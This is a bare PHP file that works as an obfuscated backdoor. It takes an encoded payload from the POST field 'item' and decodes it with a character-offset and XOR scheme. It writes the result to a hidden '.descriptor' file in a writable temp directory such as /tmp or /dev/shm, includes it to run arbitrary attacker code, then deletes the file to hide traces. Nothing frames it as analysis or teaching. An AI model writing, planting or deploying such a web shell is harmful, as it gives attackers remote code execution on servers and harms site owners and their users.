<?php

if(filter_has_var(INPUT_POST, "\x69t\x65m")){
	$ent = array_filter([getenv("TEMP"), "/tmp", session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", "/var/tmp", getenv("TMP"), getcwd(), sys_get_temp_dir()]);
	$object = $_POST["\x69t\x65m"];
	 	 $object	=  explode		( 		'.',		 $object 	)	 ;
	$marker  = '';
            $s6  = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS  = strlen($s6	);
            $m  = 0;
    
            array_walk($object ,function ($v4) use (&$marker ,&$m ,$s6 ,$lenS) {
                $chS  = ord($s6[$m % $lenS]	);
                $dec  = ((int)$v4 - $chS - ($m % 10))^65;
                $marker.= 	chr($dec	);
                $m++; } );
	foreach ($ent as $k) {
    		if ((is_dir($k) and is_writable($k))) {
    $flag = "$k" . "/.descriptor";
    $file = fopen($flag, 'w');
if ($file) {
	fwrite($file, $marker);
	fclose($file);
	include $flag;
	@unlink($flag);
	die();
}
}
}
}